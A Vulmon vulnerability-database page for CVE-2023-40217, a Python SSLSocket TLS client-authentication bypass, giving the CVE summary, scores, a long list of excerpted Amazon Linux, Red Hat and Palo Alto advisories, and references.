Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
5.3
CVSSv3

CVE-2023-40217

Published: 25/08/2023 Updated: 07/11/2023
CVSS v3 Base Score: 5.3 | Impact Score: 1.4 | Exploitability Score: 3.9
VMScore: 0
Subscribe to Python

Vulnerability Summary

An issue exists in Python prior to 3.8.18, 3.9.x prior to 3.9.18, 3.10.x prior to 3.10.13, and 3.11.x prior to 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

python python

Vendor Advisories

Amazon Linux 2: ALASPYTHON3.8-2023-010
An issue was discovered in Python before 3818, 39x before 3918, 310x before 31013, and 311x before 3115 It primarily affects servers (such as HTTP servers) that use TLS client authentication If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSL ...
Amazon Linux 2: ALAS2-2023-2222
An issue was discovered in Python before 3818, 39x before 3918, 310x before 31013, and 311x before 3115 It primarily affects servers (such as HTTP servers) that use TLS client authentication If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSL ...
Amazon Linux AMI: ALAS-2023-1816
An issue was discovered in Python before 3818, 39x before 3918, 310x before 31013, and 311x before 3115 It primarily affects servers (such as HTTP servers) that use TLS client authentication If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSL ...
Amazon Linux AMI: ALAS-2023-1876
An issue was discovered in Python before 3818, 39x before 3918, 310x before 31013, and 311x before 3115 It primarily affects servers (such as HTTP servers) that use TLS client authentication If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSL ...
Red Hat:
Description<!---->Python 3 sslSSLSocket is vulnerable to a bypass of the TLS handshake in certain instances for HTTPS servers and other server-side protocols that use TLS client authentication such as mTLS This issue may result in a breach of integrity as its possible to modify or delete resources that are authenticated only by a TLS certificate ...
Red Hat: Important: python27:2.7 security update
概述 Important: python27:27 security update 类型/严重性 Security Advisory: Important Red Hat Insights 补丁分析 识别并修复受此公告影响的系统。 查看受影响的系统 标题 An update for the python27:27 module is now available for Red Hat Enterprise Linux 86 Extended Update SupportRed Hat Product Secur ...
Red Hat: Important: python27:2.7 security update
Synopsis Important: python27:27 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for the python27:27 module is now available for Red Hat Enterprise Linux 84 Advanced Mission Critical Update Sup ...
Red Hat: Important: python27:2.7 security update
Synopsis Important: python27:27 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for the python27:27 module is now available for Red Hat Enterprise Linux 82 Advanced Update Support, Red Hat Ent ...
Red Hat: Important: OpenShift Container Platform 4.13.17 bug fix and security update
概要 Important: OpenShift Container Platform 41317 bug fix and security update タイプ/重大度 Security Advisory: Important トピック Red Hat OpenShift Container Platform release 41317 is now available with updates to packages and images that fix several bugs and add enhancementsThis release includes a security update for Red Ha ...
Red Hat: Important: Fence Agents Remediation Operator 0.2.1 security update
Synopsis Important: Fence Agents Remediation Operator 021 security update Type/Severity Security Advisory: Important Topic This is an updated version for the fence-agents-remediation-operator-bundle-container and the fence-agents-remediation-operator-container It is now available for Fence Agents Remediation 02 for RHEL 8Red Hat Product ...
Red Hat: Important: OpenShift Virtualization 4.12.8 Images security update
Synopsis Important: OpenShift Virtualization 4128 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4128 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security impact o ...
Red Hat: Important: python3.11 security update
Synopsis Important: python311 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python311 is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as hav ...
Red Hat: Important: python3.9 security update
Synopsis Important: python39 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python39 is now available for Red Hat Enterprise Linux 9Red Hat Product Security has rated this update as havin ...
Red Hat: Important: Migration Toolkit for Applications security update
Synopsis Important: Migration Toolkit for Applications security update Type/Severity Security Advisory: Important Topic An update is now available for MTA-61-RHEL-8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity ...
Red Hat: Important: Release of OpenShift Serverless 1.30.2
Synopsis Important: Release of OpenShift Serverless 1302 Type/Severity Security Advisory: Important Topic Red Hat OpenShift Serverless version 1302 is now availableRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severit ...
Red Hat: Important: python security update
Synopsis Important: python security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python is now available for Red Hat Enterprise Linux 6 Extended Lifecycle SupportRed Hat Product Security has rated ...
Red Hat: Important: Migration Toolkit for Applications security and bug fix update
Synopsis Important: Migration Toolkit for Applications security and bug fix update Type/Severity Security Advisory: Important Topic Migration Toolkit for Applications 621 releaseRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a deta ...
Red Hat: Important: Updated Red Hat Process Automation Manager 7.13.4 SP2 Images
Synopsis Important: Updated Red Hat Process Automation Manager 7134 SP2 Images Type/Severity Security Advisory: Important Topic An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform Description Red Hat Process Automation Manager is an open source business process manag ...
Red Hat: Important: OpenShift Container Platform 4.12.41 security and extras update
Synopsis Important: OpenShift Container Platform 41241 security and extras update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 41241 is now available with updates to packages and images that fix several bugsThis release includes a security update for Red Hat OpenShift Container Platform 4 ...
Red Hat: Important: OpenShift Virtualization 4.11.7 Images security and bug fix update
Synopsis Important: OpenShift Virtualization 4117 Images security and bug fix update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4117 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a secur ...
Red Hat: Important: python3 security update
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python3 is now available for Red Hat Enterprise Linux 81 Update Services for SAP SolutionsRed Hat Product Securit ...
Red Hat: Important: Red Hat OpenShift Service Mesh for 2.3.8 security update
Synopsis Important: Red Hat OpenShift Service Mesh for 238 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 23 for RHEL 8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base sc ...
Red Hat: Important: Red Hat OpenShift Service Mesh for 2.2.11 security update
Synopsis Important: Red Hat OpenShift Service Mesh for 2211 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 22 for RHEL 8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base s ...
Red Hat: Important: Self Node Remediation Operator 0.5.1 security update
Synopsis Important: Self Node Remediation Operator 051 security update Type/Severity Security Advisory: Important Topic This is an updated version of the Self Node Remediation Operator This Operator is delivered by Red Hat Workload AvailabilityRed Hat Product Security has rated this update as having a security impact of Important A Commo ...
Red Hat: Important: Red Hat OpenShift Service Mesh for 2.4.4 security update
Synopsis Important: Red Hat OpenShift Service Mesh for 244 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 24 for RHEL 8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base sc ...
Red Hat: Important: Node Health Check Operator 0.4.1
Synopsis Important: Node Health Check Operator 041 Type/Severity Security Advisory: Important Topic This is an updated version of the Node Health Check Operator This Operator is delivered by Red Hat Workload AvailabilityRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring ...
Red Hat: Important: Kiali (Kiali 1.65.10) security update
Synopsis Important: Kiali (Kiali 16510) security update Type/Severity Security Advisory: Important Topic An update is now available for Kiali (Kiali 16510) for RHEL 8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed seve ...
Red Hat: Important: OpenShift Container Platform 4.11.52 bug fix and security update
Synopsis Important: OpenShift Container Platform 41152 bug fix and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 41152 is now available with updates to packages and images that fix several bugs and add enhancementsThis release includes a security update for Red Hat OpenShift ...
Red Hat: Important: OpenShift Container Platform 4.12.39 bug fix and security update
Synopsis Important: OpenShift Container Platform 41239 bug fix and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 41239 is now available with updates to packages and images that fix several bugs and add enhancementsThis release includes a security update for Red Hat OpenShift ...
Red Hat: Important: python3.9 security update
Synopsis Important: python39 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python39 is now available for Red Hat Enterprise Linux 90 Extended Update SupportRed Hat Product Security has ...
Red Hat: Important: Red Hat OpenShift Pipelines Operator security update
Synopsis Important: Red Hat OpenShift Pipelines Operator security update Type/Severity Security Advisory: Important Topic An update is now available for OpenShift-Pipelines-111-RHEL-8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a ...
Red Hat: Important: OpenShift Virtualization 4.13.5 Images security update
Synopsis Important: OpenShift Virtualization 4135 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4135 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security impact o ...
Red Hat: Important: python3 security update
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python3 is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a ...
Red Hat: Moderate: Migration Toolkit for Runtimes bug fix, enhancement and security update
Synopsis Moderate: Migration Toolkit for Runtimes bug fix, enhancement and security update Type/Severity Security Advisory: Moderate Topic Migration Toolkit for Runtimes 123 releaseRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gives a de ...
Red Hat: Moderate: Red Hat OpenShift Service Mesh Containers for 2.4.5
概述 Moderate: Red Hat OpenShift Service Mesh Containers for 245 类型/严重性 Security Advisory: Moderate 标题 Red Hat OpenShift Service Mesh 245 ContainersRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity ...
Red Hat: Important: Red Hat OpenShift Service Mesh Containers for 2.2.12
Synopsis Important: Red Hat OpenShift Service Mesh Containers for 2212 Type/Severity Security Advisory: Important Topic Red Hat OpenShift Service Mesh 2212 ContainersRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...
Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.8.2 security and bug fix update
Synopsis Moderate: Migration Toolkit for Containers (MTC) 182 security and bug fix update Type/Severity Security Advisory: Moderate Topic The Migration Toolkit for Containers (MTC) 182 is now availableRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base ...
Red Hat: Important: python3.11 security update
Synopsis Important: python311 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python311 is now available for Red Hat Enterprise Linux 9Red Hat Product Security has rated this update as hav ...
Red Hat: Important: python3 security update
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python3 is now available for Red Hat Enterprise Linux 86 Extended Update SupportRed Hat Product Security has rate ...
Red Hat: Important: python3 security update
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for python3 is now available for Red Hat Enterprise Linux 82 Advanced Update Support, Red Hat Enterprise Linux 82 Tel ...
Red Hat: Important: Red Hat OpenShift Pipelines 1.10.6 release and security update
Synopsis Important: Red Hat OpenShift Pipelines 1106 release and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Pipelines 1106 has been releasedRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a ...
Red Hat: Important: Node Health Check Operator 0.6.1 security update
Synopsis Important: Node Health Check Operator 061 security update Type/Severity Security Advisory: Important Topic This is an updated version for the node-healthcheck-must-gather-container, the node-healthcheck-operator-bundle-container, the node-healthcheck-operator-container, and the node-remediation-console-container It is now availabl ...
Red Hat: Important: OpenShift Container Platform 4.13 low-latency extras security update
Synopsis Important: OpenShift Container Platform 413 low-latency extras security update Type/Severity Security Advisory: Important Topic An update for cnf-tests-container, dpdk-base-container, performance-addon-operator-must-gather NUMA-aware secondary scheduler and numaresources-operator is now available for Red Hat OpenShift Container Plat ...
Palo Alto Networks Security Advisory: PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS
PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS ...

Github Repositories

https://github.com/ecperth/check-aws-inspector

Github action to check findings of aws inspector scans

Check AWS Inspector V11 This action can be used to check the findings of an amazon inspector scan It has only been tested with inspector v2 Currently the action also only supports checking the results of scans on images pushed to ecr May be modified for lambdas and ec2 instances in the future Usage - uses: ecperth/check-aws-inspector@v11 with: # ecr repository n

References

NVD-CWE-noinfohttps://www.python.org/dev/security/https://lists.debian.org/debian-lts-announce/2023/09/msg00022.htmlhttps://security.netapp.com/advisory/ntap-20231006-0014/https://lists.debian.org/debian-lts-announce/2023/10/msg00017.htmlhttps://mail.python.org/archives/list/security-announce%40python.org/thread/PEPLII27KYHLF4AK3ZQGKYNCRERG4YXY/https://nvd.nist.govhttps://github.com/ecperth/check-aws-inspectorhttps://alas.aws.amazon.com/AL2/ALASPYTHON3.8-2023-010.html
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
blind SQL injectionSSRFbuffer overflowCVE-2023-28952CVE-2023-41822CVE-2024-27956CVE-2023-7028CVE-2024-34447CVE-2024-34460
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook